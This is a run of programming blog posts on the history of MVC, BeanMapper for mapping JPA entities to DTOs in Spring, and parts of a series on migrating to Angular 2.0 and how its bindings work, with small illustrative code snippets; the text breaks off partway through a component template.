The goal of this series is to show you how these other architectures came into being, the problems they try to solve, and how they relate to each other. This series is not an exhaustive tutorial on these new architectures; instead it seeks to provide you with information on a more conceptual level.</div>
</div>
<h2>
We need to talk about MVC</h2>
<div>
<div>
For a long time MVC has been our golden goose. It became our GOTO pattern for creating user interfaces. It has been so ubiquitous that for a long time, if someone created a new framework for handling User Interfaces, you would automatically assume that it was an MVC framework.</div>
<div>
<br /></div>
<div>
But 'The times they are a-changin'. MVC for the front-end seems to be dying off in favor of something "else". This is the first part of a series of blog posts trying to figure out what this "else" is.</div>
<div>
<br /></div>
<div>
But first we must define what MVC is.<br />
<br />
<br />
<a name='more'></a></div>
</div>
<h2>
Where did MVC come from?</h2>
<div>
<div>
In the 1970's a very talented group of people were working at Xerox's legendary Palo Alto Research Center (PARC), the home of many revolutionary ideas for the Graphical User Interface. It is the place where Steve Jobs famously got some of the ideas for the Apple computer.</div>
<div>
<br />
So in the 70's they had a programming language called Smalltalk. Smalltalk offered a development environment in which you could graphically debug and inspect your program, which was at the time revolutionary.</div>
<div>
<br /></div>
<div>
It comes as no surprise to me that this same bedrock gave birth to the invention of the Model View Controller architecture.</div>
<div>
<h2>
MVC: a definition</h2>
</div>
</div>
<div>
<div>
MVC stands for Model View Controller: three concepts for structuring your code. The Model represents the 'state' of the application. The state of the application is rendered by the View. The Controller manipulates the Model, which in turn updates the View. The View offers widgets such as text areas and radio buttons to trigger the actions in the Controller which manipulate the Model.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Dpxnzr02rRo/V2JycUjUutI/AAAAAAAAAEE/URM03XsQoU4po2Ei32DLB9ey1w1gOwP9ACLcB/s1600/500px-MVC-Process.svg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Image visually explains how Model View Controller relate to each other." border="0" height="320" src="https://3.bp.blogspot.com/-Dpxnzr02rRo/V2JycUjUutI/AAAAAAAAAEE/URM03XsQoU4po2Ei32DLB9ey1w1gOwP9ACLcB/s320/500px-MVC-Process.svg.png" title="Model View Controller" width="290" /></a></div>
<div>
It is the delicate interplay of these three components which makes Graphical User Interfaces come to life.</div>
</div>
<h2>
MVC and the Web</h2>
<div>
<div>
It didn't take long before the web also started using MVC as a pattern to structure applications. Many server side MVC frameworks started popping up such as:</div>
<div>
<ul>
<li><a href="http://docs.spring.io/autorepo/docs/spring/4.2.x/spring-framework-reference/html/mvc.html" target="_blank">Spring MVC</a></li>
<li><a href="https://www.djangoproject.com/" target="_blank">Django</a></li>
<li><a href="http://rubyonrails.org/" target="_blank">Ruby on Rails </a></li>
</ul>
</div>
<div>
The Model would represent an Entity which was stored in a Database. It would often simply map directly onto a row in a particular database table.</div>
<div>
<br /></div>
<div>
The Controller was often defined as the place where HTTP Requests entered the application and where HTTP Responses were returned.</div>
<div>
<br /></div>
<div>
The View was the 'template' which took some Models and rendered the desired page. A Controller would send the complete View back to the browser.</div>
<div>
<br /></div>
<div>
MVC as a term had, however, lost some of its meaning. The jump from a standalone desktop application to a client-server model muddled the definitions of each 'letter' a little.</div>
<div>
<br /></div>
<div>
Should a model be 'fat' and be responsible for retrieving itself from the database? Or should a model be lean, simply be used as an Object, and let some Repository handle filling in the data? In other words: should we use the <a href="https://en.wikipedia.org/wiki/Active_record_pattern" target="_blank">ActiveRecord</a> pattern or the <a href="http://martinfowler.com/eaaCatalog/repository.html" target="_blank">Repository Pattern</a>?</div>
<div>
<br /></div>
<div>
Should a controller contain view logic? Should a model contain view logic?</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
Every framework answers these questions differently. In this regard MVC means something different per framework. Also, slight variations on MVC started popping up, such as <a href="https://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93viewmodel" target="_blank">Model View ViewModel</a> (MVVM) and <a href="https://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93presenter" target="_blank">Model View Presenter</a> (MVP), adding to the confusion.</div>
<div>
<br /></div>
<div>
MVC is ubiquitous but that does not mean everyone's definition of MVC is the same!</div>
</div>
<h2>
Web Applications</h2>
<div>
<div>
At one point the web moved from having only websites to also having web-applications.</div>
<div>
<br /></div>
<div>
A web application behaves more like a classic desktop application; it can be a game or serve a specific business need. For example a web application could:</div>
<div>
<ol>
<li>Manage a power grid for a utility company.</li>
<li>Manage inventory for a store.</li>
<li>Provide an interface to buy and trade stocks.</li>
<li>Manage git repositories for an IT company.</li>
</ol>
</div>
<div>
For a time we built web-applications with the same technology as we did our websites. They were server side applications that used JavaScript to enhance the usability of our web-applications. As time passed we wanted to do more and more complex things with our User Interfaces. The JavaScript behind those applications soon became spaghetti code.</div>
<div>
<br /></div>
<div>
In those days we would often use <a href="https://jquery.com/" target="_blank">jQuery</a>. jQuery marries the DOM and JavaScript via CSS selectors. Changing the DOM's structure could break your JavaScript behavior. The result was a very brittle application.</div>
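<div>
A small, hypothetical example of that coupling (the selector and markup are made up): the handler below only works as long as the HTML keeps this exact structure and class name, and nothing warns you when a markup change silently breaks it.</div>
<pre><code class="javascript">// Assumes markup like: <ul id="menu"><li><a class="delete" href="#">x</a></li></ul>
$('#menu li a.delete').on('click', function (event) {
  event.preventDefault();
  // Rename the class, or wrap the list in an extra element,
  // and this handler simply no longer fires.
  $(this).closest('li').remove();
});
</code></pre>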
<div>
<br /></div>
<div>
We needed to step away from the traditional fat server, thin client model, in which the browser was simply used as a rendering tool for the UI with some JavaScript to enhance the User Experience, to a model in which the browser took full charge of how the UI was rendered.</div>
<div>
<br /></div>
<div>
Soon we started rendering our applications using JavaScript MVC frameworks, which is the topic of the next blog post in this series: <a href="http://dontpanic.42.nl/2016/06/post-mvc-mvc-and-javascript.html" target="_blank">MVC and JavaScript</a>.</div>
</div>
Anonymousnoreply@blogger.com4tag:blogger.com,1999:blog-8962763253387334081.post-28893259031825789442016-02-23T08:23:00.002+01:002016-02-23T08:27:07.221+01:00The Case for BeanMapper<h2>Introduction</h2>
<p>For a Spring Web developer, the situation is probably well known; you have an Entity, defined as a class that is persisted to some kind of persistence layer. The Entity must be partially exposed to the outside world and the Entity must be creatable and updatable.</p>
<img alt="mapping_with_entities" width="100%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqDuLHL-C1MQeGqev9fOPro0vzXrdHCbKdK7t31sk_t7azaFXHe1hO2mug5i_S9Z5cNKiYD5meDI45_raqv9S71Pg-vU9h0THO6W-okYDAsgDoWuJicKRDFH5kaNR6a1X0-AFZ1TziGWJL/s1600/mapping-with-entities.png" />
<a name='more'></a>
<p>Typically, Jackson would be instructed to map the JSON to the Entity when a create/update takes place, and the Entity to JSON when a read request takes place.</p>
<p>Let us assume we have the following Entity class (JPA annotations removed):</p>
<pre><code class="java">
public class Car {
private Long id;
private String overrideCode;
private String licensePlate;
private String owner;
private List<Car> relatedCars; // deep fetch tree
// appropriate getters & setters
}
</code></pre>
<h2>Problem - Lack of control</h2>
<p>Let us suppose that the domain requires that the overrideCode must not be exposed. Also, the owner is set once and may not be overwritten.</p>
<h3>Issue I - Clean the input</h3>
<p>By default, all fields from the JSON object will be mapped to the Entity. Therefore it is possible to:</p>
<ul>
<li>set your own ID and force an Entity to be merged on that basis</li>
<li>set an owner different from the one that Car had</li>
</ul>
<p>The application will then have to scrub the entity to make sure it was not passed values it should not be able to update. For example, the ID might have to be checked against the authorities of the current user and the owner field must be taken from the existing record if it already exists.</p>
<h3>Issue II - Clean the output</h3>
<p>When the object is mapped back to JSON, the secret code must be scrubbed from the output. This could be done by annotating the entity with JSON specific instructions to make sure the field is scrubbed.</p>
<p>Showing the related cars in the result leads to a large JSON file with lots of data that is not appropriate for the calling system. This field must be scrubbed as well to prevent fetches of these records.</p>
<h3>Consciously scrubbing</h3>
<p>Bottom line is that the default is to pass everything, requiring a conscious decision on the side of the developer to scrub data, both for incoming and outgoing traffic.</p>
<p>Failing to foresee what must be scrubbed results in a failure to uphold an implicit contract, at best introducing mild data leakage and at worst critical security flaws.</p>
<h2>Solution - Mapping with intermediate objects</h2>
<p>It would be possible to work on the basis of Data Transfer Objects (DTOs). In this case JSON will be transformed into a Form (incoming DTO), before being transformed into an Entity. The Entity will be transformed into a Result (outgoing DTO), before being transformed into JSON.</p>
<img alt="mapping_with_intermediate_objects" width="100%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVbFuinCjulOaIi3vzK_6zzNrijmmLwEGRNYDvVVpRRYorWWJwocMZU6tIOwd_YU4Pi52U4kR_DqKt82tl7708ma-0ytO25OhXenFib418PMJp0Zefb7fAyvmkVtWTTWBZ9TX7G86x_B8_/s1600/mapping-with-forms-and-results.png" />
In our example, the Form looks like this:
<pre><code class="java">
public class CarForm {
public String overrideCode;
public String licensePlate;
}
</code></pre>
<p>ID is not passed, since this is a given. Owner is not passed either, since we decided it cannot be changed in our domain. Related cars are probably determined somewhere else in the application, so there is no use in passing those. The form becomes very simple and contains only what we need.</p>
<p>The Result looks like this:</p>
<pre><code class="java">
public class CarResult {
public Long id;
public String licensePlate;
public String owner;
}
</code></pre>
<p>Now we do pass the ID, since it helps our consumer to retrieve the object or to initiate an update call. The overrideCode is dropped, because we do not want it to be exposed. Also, the related cars are dropped, because we do not want to trigger the fetches and we do not require them.</p>
<h2>New problem - Lots of manual mappings</h2>
<p>Regrettably, we now have a new problem. Our application becomes responsible for mapping from Form to Entity and from Entity to Result:</p>
<pre><code class="java">
// Mapping from Form to Entity
Car car = new Car();
car.setOverrideCode(form.overrideCode);
car.setLicensePlate(form.licensePlate);
// Mapping from Entity to Result
CarResult carResult = new CarResult();
carResult.id = car.getId();
carResult.licensePlate = car.getLicensePlate();
carResult.owner = car.getOwner();
</code></pre>
<img alt="manual_mapping" width="100%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZmDHgUq_QDHP20CkQ0-T11aawCaadzkTg3oazUBUVk2YgGdLwwZ6NuHll2VDtS2tNWrgm30Q8BMHay7QWv6l5pIRjIWnjRK96Z_xhua6H70unwmLa-6Y_DD_PwWTLks-OAO8A9QJKB1Fh/s1600/manual-mapping.png" />
<p>This logic is very brittle, since for an Entity it will need to be maintained in two different places. It is no wonder that, confronted with this situation, scrubbing does not seem so bad.</p>
<h2>Solution - Enter BeanMapper</h2>
<p>How about if mapping from Form to Entity and from Entity to Result can be done automatically? Let us suppose we have a tool that is able to map similar fields from dissimilar classes. In this case, it would be just a matter of passing both instances and delegating the task of mapping from source to target to this tool.</p>
<p><a href="http://beanmapper.io">BeanMapper</a> does just that:</p>
<pre><code class="java">
BeanMapper beanMapper = new BeanMapper();
// Mapping from Form to Entity
Car car = beanMapper.map(form, Car.class);
// Mapping from Entity to Result
CarResult carResult = beanMapper.map(car, CarResult.class);
</code></pre>
<p>Fields that do not exist are simply not mapped. It does what you expect at virtually no cost. There are many ways you can configure and guide the BeanMapper, which is well beyond the scope of this article. If the above case sounds familiar to you, it is worth checking out <a href="http://beanmapper.io">BeanMapper</a>.</p>
<p><i>Later articles will show in-depth examples.</i></p>Anonymoushttp://www.blogger.com/profile/07839346688527113490noreply@blogger.com3tag:blogger.com,1999:blog-8962763253387334081.post-20871646873991153692015-08-13T14:00:00.000+02:002016-02-02T08:58:30.945+01:00The Road to Angular 2.0 part 6: Migration<h1>Intro</h1><br />
I gave a presentation at the <a href="http://gotoams.nl/">GOTO conference in Amsterdam</a> titled: The Road to Angular 2.0. In this <a href="http://gotocon.com/amsterdam-2015/presentation/The%20Road%20to%20Angular%202.0">presentation</a>, I walked the Road to Angular 2.0 to figure out why Angular 2.0 was so different from 1.x.<br />
<br />
This series of blogposts is a follow up to that presentation.<br />
<h1>Migration</h1><br />
<a href="http://blog.42.nl/articles/road-angular-2-0-pt-5-bindings/">Last week we discussed the new bindings system in Angular 2.0</a>, and we saw that by using trees Angular 2.0 applications use less memory and are faster than before.<br />
<br />
In this final instalment of this series, we are going to look at how we can migrate our Angular 1.x applications to Angular 2.0.<br />
<br />
<a name='more'></a><br />
<br />
<h1>The road to 2.0</h1><br />
How do you migrate an Angular 1.x app to Angular 2.0?<br />
<div style="text-align: center;"><a href="http://blog.42.nl/wp-content/uploads/2015/08/migration-questionmark.png"><img alt="migration-questionmark" class="size-full wp-image-1323 aligncenter" src="http://blog.42.nl/wp-content/uploads/2015/08/migration-questionmark.png" height="114" width="400" /></a></div><br />
The answer you might hope for is running some magical wizard in some fancy IDE that will take care of the process for you. Does such a magical solution exist? The answer, unfortunately, is no. There is no easy way to migrate your applications without doing some work yourself.<br />
<br />
<a href="https://www.youtube.com/watch?v=pai1ZdFI2dg">Here is a video from the ng-conf showing how you can migrate code from Angular 1.3 to Angular 2.0</a>. It is worth a view and shows the manual work required to upgrade an Angular application.<br />
<h1>A tale of two roads</h1><br />
The Angular team states that there are two roads to migrate an Angular 1.x app to 2.0: Big Bang and Incremental.<br />
<div style="text-align: center;"><a href="https://blog.42.nl/wp-content/uploads/2015/08/migration-options.png"><img alt="migration-options" class="size-full wp-image-1324 aligncenter" height="320" src="https://blog.42.nl/wp-content/uploads/2015/08/migration-options.png" width="585" /></a></div><br />
<br />
<h2>Big Bang</h2><br />
Big Bang is a migration path in which you halt all development on an application, and migrate an entire application to Angular 2.0 in one Big Bang.<br />
<br />
The biggest benefit of a Big Bang migration is that it is the fastest way to get to Angular 2.0. This means you can use all the cool new features such as components, TypeScript and the new Template syntax as soon as possible.<br />
<br />
Big Bang has a couple of drawbacks: first it might be difficult to convince your manager or product owner to freeze the product you are working on. Performing a Big Bang migration whilst the application is changing underneath your feet is not something I would recommend. So it is imperative that the application is frozen so the target does not move. Trying to sell this to your manager / product owner is going to be difficult.<br />
<br />
The second drawback is that the size of your application determines how easy it is to pull a Big Bang off. The larger your application the more time it will take to perform the Big Bang. The more time it takes to perform a Big Bang the more difficult it is to get the application freeze approved.<br />
<br />
The third drawback is that when you rely on third party libraries such as: <a href="https://angular-ui.github.io/bootstrap/">ui-bootstrap</a> or <a href="https://github.com/mgonto/restangular">restangular</a>, you will have to wait until they've upgraded to 2.0 as well. This means that you cannot perform a Big Bang until each and every one of your dependencies has upgraded to 2.0. Of course you could work around this problem by dropping a dependency and writing it yourself, but this can be a lot of work, especially if your application has "big" dependencies that do most of the work in your application.<br />
<h2>Incremental</h2><br />
Incremental is a migration path in which you update parts of your application with Angular 2.0 code, and keep parts of your code Angular 1.x code. This is possible because you can run Angular 2.0 applications and 1.x applications side by side.<br />
<br />
You can do this in two flavors: either you have an Angular 2.0 app which includes an Angular 1.x app, or vice versa, an Angular 1.x app which includes an Angular 2.0 app. This gives us the freedom to mix and match Angular 1.x and 2.0 as we please.<br />
<br />
For example: we can migrate everything from controllers to services to Angular 2.0, and keep some select directives, such as ui-bootstrap, on Angular 1.3. Another example is that we stick to Angular 1.x for our controllers and services, but write all of our new directives as Angular 2.0 components.<br />
<br />
The benefit of Incremental is that we have a lot of flexibility in how we migrate our applications to Angular 2.0. Just like the Big Bang migration path Incremental also has some drawbacks.<br />
<br />
The first drawback is that you will bundle Angular 1.x with 2.0. This means that the browser will have to download two complete frameworks, and parse two complete frameworks, which will impact the performance of your application negatively.<br />
<br />
The second drawback is that having two frameworks, Angular 1.x and 2.0, with two very different philosophies, will make your code look like a <a href="https://en.wikipedia.org/wiki/Chimera_(mythology)">Chimera</a>: a strange hybrid that is stuck between two worlds, not a pretty picture. The only way to fix this is to eventually migrate to Angular 2.0 completely.<br />
<h2>Big Bang vs Incremental</h2><br />
The question you might ask is: which is better, Big Bang or Incremental? The answer is that it depends on the nature of your application and your project's circumstances. Here is a decision matrix:<br />
<div style="text-align: center;"><a href="http://blog.42.nl/wp-content/uploads/2015/08/angular-path-matrix.png"><img alt="angular-path-matrix" class=" wp-image-1328 aligncenter" src="http://blog.42.nl/wp-content/uploads/2015/08/angular-path-matrix.png" height="290" width="614" /></a></div><br />
Basically the matrix states that the smaller your application is the more Big Bang makes sense. This is because the time it takes to perform a Big Bang is directly related to the size of the application.<br />
<br />
Another facet in the decision is how many dependencies the application has. As stated before you can only upgrade to 2.0 completely when all your dependencies have upgraded. However some apps are more dependent on external dependencies than others. If you, for example, depend heavily on some big external Google Maps directive, it might make sense to wait until that directive has updated, and do an Incremental upgrade instead.<br />
<br />
The last facet of the matrix is the time you can "get" to migrate to Angular 2.0. This is really a circumstance which is more political than technical; it depends on management. If you get oceans of time to migrate, Big Bang makes more sense; if there is a focus on new features, Incremental makes more sense.<br />
<h1>Preparing for 2.0</h1><br />
There are steps you can take to prepare for a migration to Angular 2.0. The closer you can get your 1.x application to the 2.0 philosophy, the easier it is to migrate to Angular 2.0.<br />
<h2>Stop using $scope</h2><br />
In Angular 2.0 components will no longer have a '$scope'; instead the instance of the component's controller will become the scope. To prepare for this change I recommend that you use the "<a href="http://toddmotto.com/digging-into-angulars-controller-as-syntax/">controllerAs</a>" syntax. This way you won't have $scopes that need to be removed when you migrate to 2.0.<br />
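A minimal sketch of the difference (the module, controller, and property names are made up for illustration):<br />
<pre><code class="javascript">// Binding to $scope, the style to move away from:
angular.module('app').controller('PersonController', function($scope) {
  $scope.name = 'Maarten';
});

// Binding to the controller instance instead, using controllerAs:
angular.module('app').controller('PersonController', function() {
  this.name = 'Maarten';
});

// In the template: <div ng-controller="PersonController as person">{{ person.name }}</div>
</code></pre>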
<h2>Upgrade to 1.4</h2><br />
Upgrading to 1.4.x, the latest stable version of Angular, is a good step to take. Upgrading to 1.4 will make it easier to migrate to Angular 1.5, which brings me to my next point.<br />
<h2>Upgrade to 1.5 when it is released</h2><br />
The goal of Angular 1.5 is to make migrating from Angular 1.x to 2.0 easier. The exact nature of these features is still in flux. One feature that I'm personally rooting for is the "<a href="https://github.com/angular/angular.js/issues/10007">component helper</a>" function. This will make it easier to write directives that mimic Angular 2.0 components. By mimicking Angular 2.0 components Angular 1.5 will be closer to the philosophy of Angular 2.0, and being closer to the Angular 2.0 philosophy makes migrating easier.<br />
<h2>Start using ES6 today!</h2><br />
Using a transpiler such as <a href="http://babeljs.io/">Babel</a> you can start writing ES6 today. A transpiler transforms ES6 code to ES5 code, so your application will run in today's browsers.<br />
<br />
The biggest benefit of ES6 is that it allows you to write "classes". Angular 2.0 will rely heavily on classes; Components are classes, for example. By using classes to define your services and your directives' controllers you have already done some of the migration work.<br />
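For example, a hedged sketch of what that could look like in an Angular 1.x codebase today (names are made up; this is not an official migration recipe):<br />
<pre><code class="javascript">// An ES6 class used as a controller; only the registration below
// would need to change when this becomes an Angular 2.0 component.
class PersonController {
  constructor() {
    this.name = 'Maarten';
  }
  greet() {
    return 'Hi there ' + this.name;
  }
}

angular.module('app').controller('PersonController', PersonController);
</code></pre>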
<h2>The new Component router</h2><br />
Angular 2.0 will have a new built-in router called the <a href="https://angular.github.io/router/">Component Router</a>. This router will, as its name suggests, route on components: it will instantiate a component based on the current URL.<br />
<br />
The nice thing about the Component Router is that the router will be back ported to Angular 1.5. This means you can start using the new router in 1.5 and when you upgrade to Angular 2.0, migrating your routes is already done.<br />
<br />
If you use ui-router today instead of ngRoute, you might want to read up on the <a href="https://medium.com/angularjs-meetup-south-london/angular-just-another-introduction-to-ngnewrouter-vs-ui-router-72bfcb228017">differences between ui-router and the Component Router</a>.<br />
<br />
Note that the Component Router was called the ngNewRouter until a couple of months ago.<br />
<h1>A new Hope</h1><br />
At the <a href="https://angularu.com/ng/">AngularU conference, key Angular core team members gave a keynote</a> in which they announced that Google has some internal tools to make migrating easier. They are in the process of evaluating which tools are useful to release to the Angular community. There isn't much information on these tools so there isn't much more to tell you, but there is some hope that migrating will be easier and, more importantly, partly automated.<br />
<h1>Starting new projects</h1><br />
I've often received the following question: "I'm starting a new project, should I wait for Angular 2.0, or should I start in Angular 1.4?" The answer is to just start using Angular 1.4, and migrate to 2.0 later.<br />
<br />
The reason for this is that Angular 1.x is not abandoned; in fact it is quite the opposite. The Angular team has been split into two teams: one team for 2.0 and one team for 1.x. The 1.x team even has a new project lead: <a href="https://twitter.com/petebd">Pete Bacon Darwin</a>, so 1.x is far from abandoned. With Angular 1.5's focus on migration from 1.x to 2.0, starting on 1.x and migrating to 2.0 will mean some work, but it will not be the end of the world, and if you follow my advice on preparing for 2.0 you will make migrating easier.<br />
<br />
Another reason not to wait for Angular 2.0 is that it still doesn't have a release date; in fact there isn't even a beta available yet. Hopefully we will learn more at the <a href="http://angularconnect.com/">AngularConnect conference in London in October</a>, and hopefully they will announce something more concrete than: "it is done when it is done".<br />
<h1>Conclusion</h1><br />
Now you know the somewhat painful truth that migrating from Angular 1.x to 2.0 is not going to happen at the click of a button. We have seen that the Angular team has put together two migration paths: Big Bang and Incremental. A Big Bang migration gets your project to Angular 2.0 as quickly as possible. The Incremental migration allows us to combine 1.x and 2.0 in the same application, so we can migrate step by step.<br />
<br />
We also know that we can prepare for Angular 2.0 by using a transpiler such as <a href="http://babeljs.io/">Babel</a> to start using ES6 classes in our Angular applications today. We should also upgrade our applications to the latest Angular 1.x version that is available, because that version is closest to Angular 2.0.<br />
<br />
The final takeaway of this blogpost is that Angular 1.x is not going anywhere anytime soon, it is still actively being maintained, and the community is still alive and kicking. So starting a project in Angular 1.x and migrating to 2.0 later is a valid strategy.<br />
<br />
I hope you enjoyed this series of blog posts and found them informative. Hopefully Angular 2.0 gets released soon; I think it will be a great leap forward for us, the Angular community.<br />
<br />
Anonymousnoreply@blogger.com35tag:blogger.com,1999:blog-8962763253387334081.post-51130532793048404152015-08-06T14:00:00.000+02:002016-02-25T11:33:21.288+01:00The Road to Angular 2.0 part 5: Bindings<h1>Intro</h1><br />
I gave a presentation at the <a href="http://gotoams.nl/">GOTO conference in Amsterdam</a> titled: The Road to Angular 2.0. In this <a href="http://gotocon.com/amsterdam-2015/presentation/The%20Road%20to%20Angular%202.0">presentation</a>, I walked the Road to Angular 2.0 to figure out why Angular 2.0 was so different from 1.x.<br />
<br />
This series of blogposts is a follow up to that presentation.<br />
<h1>Bindings</h1><br />
<a href="/2015/07/the-road-to-angular-20-part-4-components.html">Last week we discussed Components</a>, which showed us a fundamental new way to think about our Angular applications.<br />
<br />
This week we are going to look at bindings, aka the way Angular automagically updates values in our views. The Angular 2.0 team put a lot of effort into making this system faster. The team reports speeds that are 3 to 10 times faster than Angular 1.x.<br />
<br />
But something had to change fundamentally in order for this speed increase to be possible.<br />
<br />
<a name='more'></a><br />
<br />
<h1>Bindings in Angular 1.x</h1><br />
Before we can understand why Angular 2.0 is faster than 1.x, and how the Angular 2.0 team did it, we must first look at how Angular 1.x handles bindings.<br />
<h2>An Angular 1.x App</h2><br />
Let's begin with a fictional Angular 1.x app which has four bindings: A, B, C and D. These bindings have relationships (or dependencies) with each other, as depicted in the image below:<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/Angular1x-app.jpg"><img alt="Angular1x-app" class="alignnone size-full wp-image-1293" height="307" src="http://blog.42.nl/wp-content/uploads/2015/07/Angular1x-app.jpg" width="495" /></a><br />
<br />
The image above shows that binding A has a relationship to binding B and vice versa. This means that whenever A updates, something might 'change' for binding B, but it doesn't necessarily have to. The same is also true in reverse: when B changes, A might also need an update.<br />
<br />
There can also be relationships that are one-sided, for example A only influences D but not the other way around.<br />
<br />
Bindings can also have subtle relationships to other bindings indirectly: B has a relationship to binding D through binding C.<br />
<br />
The point is that relationships between bindings in Angular 1.x can become pretty complex. Even when you have only four bindings. So how does Angular 1.x know when to update a 'binding' and<br />
show a different value inside the UI? The answer is dirty checking.<br />
<h2>Dirty Checking</h2><br />
Dirty checking can be explained as follows: every time there might have been a change to the view (so whenever the user clicks on something or an $http request finishes), Angular will check the value of each binding and compare it to the old value. When the value is different between the two versions Angular will update the UI. When a value differs between the two versions it is considered 'dirty', hence the term 'dirty checking'. The phase in which Angular checks for changes is called the "digest phase".<br />
<br />
To make this more concrete: let's say we have a variable called "age" and the value is currently 16. Then some event triggers the digest phase, and by now the new value of "age" is 17. Angular will compare 16 and 17, conclude that a change has occurred, and update the UI.<br />
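Conceptually, a single watcher doing such a comparison could look something like the sketch below (an illustration of the idea only, not Angular's actual implementation; all names are made up):<br />
<pre><code class="javascript">// One 'watcher' for the "age" binding.
var watcher = {
  lastValue: 16,
  get: function(scope) { return scope.age; },
  listener: function(newValue, oldValue) { /* update the DOM */ }
};

function checkWatcher(scope, watcher) {
  var newValue = watcher.get(scope);
  if (newValue !== watcher.lastValue) {   // the binding is 'dirty'
    watcher.listener(newValue, watcher.lastValue);
    watcher.lastValue = newValue;
    return true;                          // report a change back to the digest cycle
  }
  return false;
}
</code></pre>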
<br />
But what if you have a binding that depends on another binding; how does that get updated? We know, as humans, what the 'relationship' between two bindings is, and which one depends on the other, so we know intuitively in which order to evaluate the bindings. But how does Angular know which binding to evaluate first?<br />
<br />
The answer is that Angular 1.x doesn't know anything about the relationships between 'bindings'. So it cannot know in which order to perform the 'dirty' checks. What Angular does instead is evaluate each binding until all bindings have stabilized; by stabilized I mean that they have stopped changing. Angular does this by running a "loop" that will evaluate each binding until the bindings "report" that they are stabilized.<br />
<br />
This "loop" is called the digest cycle, which is a part of the digest phase. The digest cycle will resolve all bindings until none of the bindings have reported a change between runs of the cycle. The digest cycle is a subpart of the digest phase:<br />
<div style="text-align: center;"><a href="http://blog.42.nl/wp-content/uploads/2015/07/Digest-Phase.jpg"><img alt="Digest-Phase" class="size-full wp-image-1294 aligncenter" height="182" src="http://blog.42.nl/wp-content/uploads/2015/07/Digest-Phase.jpg" width="259" /></a></div><br />
If you have two bindings with a relationship, it might occur that the digest cycle needs to run multiple times before both bindings no longer change. If the bindings do not stabilize after 10 cycles Angular gives up and you get an error. This magical limit of 10 is called the Time To Live (TTL), and you can even increase or decrease it if you want to.<br />
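In Angular 1.x this limit can be changed through $rootScopeProvider during the config phase; a minimal sketch (raising the TTL to 15 purely as an illustration, with a made-up module name):<br />
<pre><code class="javascript">// Raise the digest Time To Live from the default of 10 to 15.
angular.module('app').config(['$rootScopeProvider', function($rootScopeProvider) {
  $rootScopeProvider.digestTtl(15);
}]);
</code></pre>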
<br />
When the digest cycle reports to the digest phase that it is complete and that the system is stable, only then will Angular re-render the views.<br />
<br />
So to conclude: the digest cycle is a clever way for Angular 1.x to update your UI correctly without knowing what the 'relationships' between your bindings actually mean semantically.<br />
<h1>What’s wrong with 1.x bindings?</h1><br />
The Angular 1.x way of resolving bindings, and their complex relationships, is a really great way to solve a very complex problem. However there are three downsides to the 1.x approach:<br />
<h2>Expensive</h2><br />
Resolving bindings with complex relationships by checking them in a digest cycle can lead to suboptimal performance. If you have a very complex application with multiple complex relationships between bindings, it may take Angular 1.x’s digest cycle multiple loops before it can report, to the digest phase, that the system has stabilized.<br />
<br />
In this sense resolving bindings can potentially become very expensive.<br />
<h2>Unpredictable</h2><br />
The system is also very unpredictable. If you gave me the following template:<br />
<pre><code class="javascript"><div ng-controller="PersonController as personController">
<h1>Hi {{ personController.person.name }}</h1>
<person-view person="personController.person"></person-view>
</div></code></pre><br />
And you would ask me: "How do the bindings get resolved in this template?", I would not be able to give you an answer straight away. I would have to dive deep into the "PersonController" and into the "personView" directive before I could provide an answer; for instance, what type of binding is "person" on personView? My answer would depend on what type of binding it is, but even then I could not tell you how Angular would actually resolve the binding in the digest phase.<br />
<br />
Basically the Angular 1.x bindings system is not deterministic: if you gave it the same inputs it might take a different route each time to get to the outcome. This property of the system makes it difficult to reason about an Angular 1.x application.<br />
<h2>Unnecessary</h2><br />
<h3>Immutable</h3><br />
Bindings can sometimes even be unnecessary. Consider the following: what if you know that a data structure never changes? For example: what if you rendered a menu based on an array of strings, and you knew that there was no possible way that array would ever change? In other words, you know that you will never change the menu during the run of the application.<br />
<br />
Doing dirty checking on such an immutable (never changing) data structure is a pure waste of time. There is no way to tell Angular 1.x that this structure should be exempted from the digest phase, so it gets evaluated each and every time.<br />
<h3>Observable</h3><br />
Another situation can be that you have a component, which only changes when a specific event occurs. In other words the object will never change unless that particular event is fired. Again in Angular 1.x there is no way to tell the system that such a component exists. The system will dirty check that component even though we humans know it is futile.<br />
<h1>Bindings in Angular 2.0</h1><br />
Now that we know how Angular 1.x handles bindings, and we know some of its flaws, we can look at how Angular 2.0 mitigates these flaws and improves on the system. Before we can do that we must first look at the anatomy of an Angular 2.0 application, because last week we learned that Angular 2.0 will be a component based framework: how does being component based affect the binding system?<br />
<h2>Anatomy of an Angular 2.0 application</h2><br />
Let's say we have an application that provides us with weather information for various cities in the world. The application looks something like this:<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/weather-app.jpg"><img alt="weather-app" class="alignnone wp-image-1295" height="394" src="http://blog.42.nl/wp-content/uploads/2015/07/weather-app.jpg" width="712" /></a><br />
<br />
The application consists of a Grid of WeatherStations; each station consists of a name, temperature, humidity and an icon indicating the current state of the weather. You can favorite a weather station by clicking on the "star" icon. Above the Grid are two bars: a SearchBar in which the user can filter the stations based on the name, and a SegmentedButton in which the user can toggle between all stations and the user's favorite stations.<br />
<br />
This application is written in Angular 2.0 and is therefore component based. Components are composable, which means components can be nested inside of each other. The weather app's structure looks something like this:<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/tree-components.jpg"><img alt="tree-components" class="alignnone wp-image-1298" height="340" src="http://blog.42.nl/wp-content/uploads/2015/07/tree-components.jpg" width="524" /></a><br />
<br />
Each component is a direct or indirect descendant of one “root” component, in this case the WeatherApp component. This leads to an important realization: Angular 2.0 applications are <b>trees!</b><br />
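To make that composition concrete, the root component's template could nest the other components roughly like this (a hypothetical sketch in the alpha syntax used in this series; the selectors are made up to match the description above):<br />
<pre><code class="javascript">import {Component, View} from 'angular2/angular2';
// SearchBar, SegmentedButton and Grid would be imported from their own files.

@Component({
  selector: 'weather-app'
})
@View({
  template: `
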